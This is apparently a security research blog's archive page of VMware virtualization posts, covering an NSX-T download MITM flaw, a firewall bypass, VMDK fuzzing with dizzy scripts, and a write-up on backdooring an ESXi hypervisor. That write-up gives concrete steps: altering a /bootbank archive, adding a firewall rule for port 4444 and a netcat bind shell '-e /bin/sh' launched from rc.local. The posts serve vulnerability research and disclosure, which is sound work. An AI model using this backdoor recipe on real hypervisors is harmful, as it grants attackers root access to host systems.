Breaking

VMware NSX-T MITM Vulnerability (CVE-2020-3993)

NSX-T is a Software-Defined-Networking (SDN) solution of VMware which, as its basic functionality, supports spanning logical networks across VMs on distributed ESXi and KVM hypervisors. The central controller of the SDN is the NSX-T Manager Cluster which is responsible for deploying the network configurations to the hypervisor hosts.

This summer, I looked into the mechanism which is used to add new KVM hypervisor nodes to the SDN via the NSX-T Manager. By tracing what happens on the KVM host, I discovered that the KVM hypervisor got instructed to download the NSX-T software packages from the NSX-T Manager via unencrypted HTTP and install them without any verification. This enables a Man-in-the-Middle (MITM) attacker on the network path to replace the downloaded packages with malicious ones and compromise the KVM hosts.

After disclosing this issue to VMware, they developed fixes and published the vulnerability in VMSA-2020-0023 assigning a CVSSv3 base score of 7.5.

Continue reading “VMware NSX-T MITM Vulnerability (CVE-2020-3993)”

Continue reading
Misc

VMware NSX-T Distributed Firewall can be bypassed by default

We recently came across an issue when playing around with VMware NSX-T which not anyone might be aware of when getting started with it. Because many of our customers start with transitioning to NSX-T, we want to share this with you. In short, the Distributed Firewall (DFW) of NSX-T can be easily bypassed in the default configuration because it only works effectively if at the same time, the SpoofGuard feature is enabled on all logical switch ports which is not the case by default.

Continue reading “VMware NSX-T Distributed Firewall can be bypassed by default”

Continue reading
Events

H2HC2018 – Attacking VMware NSX

Matthias and I had the pleasure to give a talk at the H2HC2018 in São Paulo, Brazil about attacking VMware NSX. The talk is an introduction to VMware NSX for security researchers, and it discusses possible attack vectors including the management, controlling, and data exchange planes. We demonstrated how to prepare a fuzzing and debugging setup for the ESXi kernel and the kernel modules. It should be noted that Olli was also supporting the research. Continue reading “H2HC2018 – Attacking VMware NSX”

Continue reading
Misc

Security Advisory for VMware vRealize Automation Center

During a recent customer project we identified several vulnerabilities in the VMware vRealize Automation Center such as a DOM-based cross-site scripting and a missing renewal of session tokens during the login. The vulnerabilities have been disclosed to VMware on November 20th, 2017. A security advisory for the vulnerabilities has been made available here on April 12th, 2018. Continue reading “Security Advisory for VMware vRealize Automation Center”

Continue reading
Breaking

VMware did it again: vCenter Remote Code Execution

Yesterday 7Elements released the description of a Remote Code Execution vulnerability in VMware vCenter. The information came in at a good point as I’m at the moment drafting a follow-up blogpost for this one which will summarize some of our approaches to virtualization security. The vCenter vulnerability is both quite critical and particularly interesting in several ways:

Continue reading “VMware did it again: vCenter Remote Code Execution”

Continue reading
Breaking

Some notes on VMware vCenter Operations Manager

While fairytales often start with “Once upon a time…”, our blogposts often start with “During a recent security assessment…” — and so does this one. This time we were able to spend some time on VMware’s vCenter Operations Manager (herein short: VCOPS). VCOPS is a monitoring solution for load and health of your vSphere environment. In order to provide this service, two virtual machines (analytics engine and Web-based UI) must be deployed (as a so-called vApp) that are configured on startup by various scripts (mainly /usr/lib/vmware-vcops/user/conf/install/firstbootcommon.sh) to match the actual environment and communicate via an OpenVPN tunnel that is established directly between the two machines. To gather the monitoring data, read-only access to the vCenter is required.

Continue reading “Some notes on VMware vCenter Operations Manager”

Continue reading
Breaking

Serial Port Debugging Between two Virtual Machines in VMware Fusion

In the course of our virtualization research, we came across a certain technical issue we couldn’t find an easy solution on knowledge bases and the like. However, as we found the question several times on the web, the following post gives just a short hint on a technical detail.

If you want to connect two virtual machines in VMware Fusion using a serial port (e.g. for debugging purposes), Fusion doesn’t provide you an GUI option to configure that. However, if you just add the following config to the debugger system’s VMX file:

serial0.present = “TRUE”
serial0.fileType = “pipe”
serial0.fileName = “/path/to/pipe”
serial0.yieldOnMsrRead = “True”
serial0.pipe.endPoint = “client”

and the following lines to the debuggee system’s VMX file:

serial0.present = “TRUE”
serial0.fileType = “pipe”
serial0.fileName = “/path/to/pipe”
serial0.yieldOnMsrRead = “True”

you can use the serial port as in the Linux or Windows VMware Workstation — even though the GUI will show you an “unsupported custom setting”:
vmware_unsupported_setting

HTH & have a good one,
Matthias

Continue reading
Breaking

VMDK Has Left the Building — Newsletter

We are pleased to announce that we summarized the results from our VMDK research in our latest newsletter.

We hope you enjoy the reading and will get some “food for thought”!

The newsletter can be found at:
ERNW_Newsletter_41_ExploitingVirtualFileFormats.pd

A digitally signed version can be found at:
ERNW_Newsletter_41_ExploitingVirtualFileFormats_signed.pdf

Enjoy your weekend,
Matthias

Continue reading
Breaking

VMDK Has Left the Building – Write Access

In our last series of posts regarding the VMDK file inclusion attack, we focused on read access and prerequisites for the attack, but avoided stating too much about potential write access. But as we promised to cover write access in the course of our future research, the following post will describe our latest research results.

First of all, the same prerequisites (which will be refined a little bit more later on) as for read access must be fulfilled and the same steps have to be performed in order to carry out the attack successfully. If that is the case, there are several POIs (Partitions Of Interest) on a ESXi hypervisor that are interesting to include:

  • /bootbank → contains several archives which build the hypervisors filesystem once they are unpacked
  • /altbootbank → backup of the prior version of bootbank, e.g. copied before a firmware update
  • /scratch → mainly log files and core dumps stored here
  • /vmfs/volumes/datastoreX → storage for virtual machine files

The root filesystem is stored on a ramdisk which is populated at boot time using the archives stored in the bootbank partition. As this means that there is no actual root partition (since it is generated dynamically at boot time and there is no such thing like a device descriptor for the ramdisk), this excludes the root file system from our attack tree, at least at first sight.

While trying to write to different partitions, we noticed that the writing sometimes fails. Evaluating the reason for the failure, we also noticed that this is only the case for certain partitions, such as /scratch. After monitoring the specific write process, we noticed the following errors:

Virtual Machine:

attx kernel: [93.238762] sd 0:0:0:0: [sda] Unhandled sense code
attx kernel: [93.238767] sd 0:0:0:0: [sda]  Result: hostbyte=invalid
                         driverbyte=DRIVER_SENSE
attx kernel: [93.238771] sd 0:0:0:0: [sda]  Sense Key : Data Protect [current]
attx kernel: [93.238776] sd 0:0:0:0: [sda]  Add. Sense: No additional sense information
attx kernel: [93.238780] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 02 04 bd 20 00 00 08 00
attx kernel: [93.238790] end_request: critical target error, dev sda, sector 33864992
attx kernel: [93.239029] Buffer I/O error on device sda, logical block 4233124
attx kernel: [93.239181] lost page write due to I/O error on sda

Hypervisor:

cpu0:2157)WARNING: NMP: nmpDeviceTaskMgmt:2210:Attempt to issue lun reset on device
                        naa.600508b1001ca97740cc02561658c136. This will clear any
                        SCSI-2 reservations on the device.
cpu0:2157)<4>hpsa 0000:05:00.0: resetting device 6:0:0:1
cpu0:2157)<4>hpsa 0000:05:00.0: device is ready

Assuming that the hypervisor hard drive is not broken for exactly the cases we try to write from within a guest machine, we performed further tests (using various bash scripts and endless writing loops) and found out that this error occurs when the hypervisor and a guest machine are trying to write at the same time to the same device. Due to the fact that the hypervisor continuously writes log files to the /scratch file system and generates all kind of I/O to the /vmfs data stores (due to the running virtual machines stored on that partition), it was not possible to write to those devices in a reliable way.

Fortunately (at least from an attacker’s point of view 😉 ) the remaining partitions, /bootbank and /altbootbank, are only accessed at boot time and it is hence possible to write to those partitions in a reliable way. At that point, the initially mentioned fact about the lacking root partition gets important again: As the root partition would be the first and most promising target of write access, it would most probably also be locked by the hypervisor as there might also be different files that would be written on periodically. So when we were searching for a way to write to the dynamically generated root partition, we came up with the following steps:

  • Include the device holding the /bootbank partition.
  • Write to the /bootbank partition.
  • Wait for the hypervisor to reboot (or perform the potential DoS attack we identified, which will be described in a future post).
  • Enjoy the files from the /bootbank partition being populated to the dynamically created root partition.

The last step is of particular relevance. /bootbank holds several files that contain archives of system-critical files and directories of the ESXi hypervisor. For example the /bootbank/s.v00 contains an archive of the directories and files, including parts of /etc.  The hypervisor restores the particular directories (such as /etc) at startup from the files stored in /bootbank. As we are able to write files to /bootbank, it is possible to replace contents of /bootbank/s.v00 and thus contents of /etc of the hypervisor ramdisk. In order to make sure that certain files in /etc are replaced, we can access the file /bootbank/boot.cfg which holds a list of archives which get extracted at boot time. As we have all necessary information to write to the root partition of the hypervisor, these are the steps to be performed:

  • Obtain /bootbank archive, in this example /bootbank/s.v00, using the well-known attack vector.
  • Convert/extract archive: The archives in /bootbank are packed with a special version of tar which is incompatible with the GNU tar. However this vmtar version can be ported to a GNU/Linux by copying the vmtar binary and libvmlibs.so from any ESXi installation.
  • Modify or add files.
  • Repack the archive.
  • Deploy the modified archive to /bootbank using the write access.

Following this generic process, we were able to install a backdoor on our ESXi5 hypervisor. In a first step, we opened a port in the ESXi firewall (which has a drop-all policy) as we wanted to deploy a bind shell (even though we could have used a connect-back shell instead, but we also want to demonstrate that is possible to modify system-critical settings). The firewall is configured by xml files stored in /etc/vmware/firewall. These xml files are built as follows:

<ConfigRoot>
  <service id='0000'>
    <id>sshServer</id>
    <rule id='0000'>
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>22</port>
    </rule>
    <enabled>false</enabled>
    <required>false</required>
  </service>
[...]
</ConfigRoot>

The xml format is kind of self-explanatory. Every service has a unique identifier id, and can have inbound and outbound rules. To enable the rule on system boot the enabled field has to be set to true.

Based on this schema it is easy to deploy a new firewall rule. Simply place a new xml file to /etc/vmware/firewall in the archive which will be written to the bootbank later on.

For example to open port 42000:

<ConfigRoot>
  <service id="0000">
    <id>remote Bind Shell</id>
    <rule id="0000">
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>4444</port>
    </rule>
    <enabled>true</enabled>
    <required>false</required>
  </service>
</ConfigRoot>

This ruleset will be applied the next time the hypervisor reboots, after overwriting one of the archives in bootbank with our altered one.

The next step is to bind a shell to the opened port. Unfortunately the netcat installed per default on the hypervisor is not capable of the “-e” option, which executes a command after an established connection. The most basic netcat bind shell just listens on a port and forwards all input to the binary specified by the -e switch:

netcat -l -p 4444 -e /bin/sh.

Luckily the netcat version of 32bit BackTrack distribution is compatible with the ESXi platform and supports the -e switch. After copying this binary to the hypervisor, we just need to make sure that the backdoor is started during the boot process by adding the following line to /etc/rc.local:

/etc/netcat –l –p 4444 –e /bin/sh &

Next time the hypervisor starts, a remote shell will listen on port 4444 with root privileges. The following steps summarize the process of fully compromising the ESXi hypervisor:

  • Include the /bootbank partition using our well-known attack path
  • Unpack /bootbank/s.v00
  • Add our bind shell port to the firewall by adding the described file to /path/to/extracted/etc/vmware/firewall
  • Add the netcat binary to /path/to/extracted/etc/nc
  • Add the above line to  /path/to/extracted/etc/rc.local
  • Wait for the next reboot of the hypervisor (or our post on the potential DoS 😉 )

At the end of the day, this means that once attacker is able to upload VMDK files to an ESXi environment (in a way that fulfills the stated requirements), it is possible to alter the configuration of the underlying hypervisor and even to install a backdoor which grants command line access.

 

Enjoy!

Pascal & Matthias

Continue reading
Breaking

Fuzzing VMDK files

As announced at last week’s #HITB2012AMS, I’ll describe the fuzzing steps which were performed during our initial research. The very first step was the definition of the interfaces we wanted to test. We decided to go with the plain text VMDK file, as this is the main virtual disk description file and in most deployment scenarios user controlled, and the data part of a special kind of VMDK files, the Host Sparse Extends.

The used fuzzing toolkit is dizzy which just got an update last week (which brings you guys closer to trunk state 😉 ).

The main VMDK file goes straight forward, fuzzing wise. Here is a short sample file:

# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=fffffffe
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 40960 VMFS "ts_2vmdk-flat.vmdk"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "c818e173248456a9f5d83051fffffffe"
ddb.uuid = "60 00 C2 94 23 7b c1 41-51 76 b2 79 23 b5 3c 93"
ddb.geometry.cylinders = "20"
ddb.geometry.heads = "64"
ddb.geometry.sectors = "32"
ddb.adapterType = "buslogic"

 

As one can easily see the file is plain text and is based upon a name=value syntax. So a fuzzing script for this file would look something link this:

name = "vmdkfile"
objects = [
    field("descr_comment", None, "# Disk DescriptorFile\n", none),

    field("version_str", None, "version=", none),
    field("version", None, "1", std),
    field("version_br", None, "\n", none),

    field("encoding_str", None, "encoding=", none),
    field("encoding", None, '"UTF-8"', std),
    field("encoding_br", None, "\n", none),
    [...]
    ]
functions = []

 

The first field, descr_comment, and the second field, version_str,  are plain static, as defined by the last parameter, so they wont get mutated. The first actual fuzzed string is the version field, which got a default value of the string 1 and will be mutated with all strings in your fuzz library.

As the attentive reader might have noticed, this is just the first attempt, as there is one but special inconsistency in the example file above: The quoting. Some values are Quoted, some are not. A good fuzzing script would try to play with exactly this inconsistency. Is it possible to set version to a string? Could one set the encoding to an integer value?

The second file we tried to fuzz was the Host Sparse Extend, a data file which is not plain data as the Flat Extends, but got a binary file header. This header is parsed by the ESX host and, as included in the data file, might be user defined. The definition from VMware is the following:

typedef struct COWDisk_Header {
    uint32 magicNumber;
    uint32 version;
    uint32 flags;
    uint32 numSectors;
    uint32 grainSize;
    uint32 gdOffset;
    uint32 numGDEntries;
    uint32 freeSector;
    union {
        struct {
            uint32 cylinders;
            uint32 heads;
            uint32 sectors;
        } root;
        struct {
            char parentFileName[COWDISK_MAX_PARENT_FILELEN];
            uint32 parentGeneration;
        } child;
    } u;
    uint32 generation;
    char name[COWDISK_MAX_NAME_LEN];
    char description[COWDISK_MAX_DESC_LEN];
    uint32 savedGeneration;
    char reserved[8];
    uint32 uncleanShutdown;
    char padding[396];
} COWDisk_Header;

 

Interesting header fields are all C strings (think about NULL termination) and of course the gdOffset in combination with numSectors and grainSize, as manipulating this values could lead the ESX host to access data outside of the user deployed data file.

So far so good, after writing the fuzzing scripts one needs to create a lot of VMDK files. This was done using dizzy:

./dizzy.py -o file -d /tmp/vmdkfuzzing.vmdk -w 0 vmdkfile.dizz

 

Last but not least we needed to automate the deployment of the generated VMDK files. This was done with a simple shell script on the ESX host, using vim-cmd, a command line tool to administrate virtual machines.

By now the main fuzzing is still running in our lab, so no big results on that front, yet. Feel free to use the provided fuzzing scripts in your own lab. Find the two fuzzing scripts here and here. We will share more results, when the fuzzing is finished.

Have a nice day and start fuzzing 😉

Daniel and Pascal

Continue reading